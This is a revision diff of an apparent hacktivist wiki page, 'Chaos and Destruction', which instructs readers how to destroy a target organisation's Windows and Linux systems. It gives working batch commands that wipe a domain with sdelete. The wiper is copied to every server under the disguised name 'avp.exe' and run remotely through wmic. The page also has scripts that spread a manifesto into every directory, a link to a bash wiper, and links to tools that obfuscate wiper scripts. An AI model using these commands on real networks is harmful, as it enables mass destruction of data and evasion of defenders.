Chaos and Destruction: Difference between revisions
| Line 12: | Line 12: | ||
=== Wiping Windows Domain === | === Wiping Windows Domain === | ||
* [https://enlacehacktivista.org/index.php?title=Pronico#Video_Timeline Guacamaya] (2:13:35 Wiping windows domain with [https://learn.microsoft.com/en-us/sysinternals/downloads/sdelete sdelete] on the domain controller) <code>sdelete64.exe -accepteula -r -s C:\*</code> | * [https://enlacehacktivista.org/index.php?title=Pronico#Video_Timeline Guacamaya] (2:13:35 Wiping windows domain with [https://learn.microsoft.com/en-us/sysinternals/downloads/sdelete sdelete] on the domain controller) <code>sdelete64.exe -accepteula -r -s C:\*</code> | ||
On the domain controller get list of server names: | On the domain controller get list of server names: | ||
| Line 17: | Line 18: | ||
Running as the domain admin, copy the sdelete64.exe binary file to all servers in your list: | Running as the domain admin, copy the sdelete64.exe binary file to all servers in your list: | ||
* copy.bat | |||
<code>for /f %%i in (servers.txt) do copy "C:\Windows\Temp\sdelete64.exe" "\\%%i\c$\Windows\avp.exe"</code> | <code>for /f %%i in (servers.txt) do copy "C:\Windows\Temp\sdelete64.exe" "\\%%i\c$\Windows\avp.exe"</code> | ||
Running as the domain admin now execute: | Running as the domain admin now execute: | ||
* byebye.bat | |||
<code>for /f %%i in (servers.txt) do wmic /node:%%i process call create "C:\Windows\ | <code>for /f %%i in (servers.txt) do wmic /node:%%i process call create "C:\Windows\avp.exe -accepteula -r -s C:\* entryPoint"</code> | ||
=== Encrypt Windows Domain === | === Encrypt Windows Domain === | ||
Revision as of 19:10, 27 July 2023
Companies have large networks consisting of both Windows and Linux systems, so if your end goal is not only leaking data to journalists but to also destroy your target then using a wiper will be the best way to achieve this goal, just make sure not to wipe critical services that may impact someones physical safety as demonstrated in Guacamaya's HackBack video, we want to destroy data, not harm human life.
Windows
Print your manifesto
@echo off
set "manifesto=C:\Users\Administrator\AppData\Local\Temp\manifesto.txt"
for /r "C:\" %%d in (.) do (
xcopy "%manifesto%" "%%d\" /Y
)
Wiping Windows Domain
- Guacamaya (2:13:35 Wiping windows domain with sdelete on the domain controller)
sdelete64.exe -accepteula -r -s C:\*
On the domain controller get list of server names:
net view /domain
Running as the domain admin, copy the sdelete64.exe binary file to all servers in your list:
- copy.bat
for /f %%i in (servers.txt) do copy "C:\Windows\Temp\sdelete64.exe" "\\%%i\c$\Windows\avp.exe"
Running as the domain admin now execute:
- byebye.bat
for /f %%i in (servers.txt) do wmic /node:%%i process call create "C:\Windows\avp.exe -accepteula -r -s C:\* entryPoint"
Encrypt Windows Domain
Encrypt Windows Domain (1:24:16 Wiping windows domain with Bitlocker)
Linux
Print your manifesto
find ~/ -type d -exec cp -R /tmp/manifesto.txt {} \;
Wiping Linux System
Wipe a Linux system using a bash wiper.
- https://web.archive.org/web/20230724204753/https://pastebin.com/raw/1LcPihYr (source)
- A Node.js CLI tool and library to heavily obfuscate bash scripts: https://www.npmjs.com/package/bash-obfuscate
- Shell script compiler: https://packages.debian.org/bullseye/shc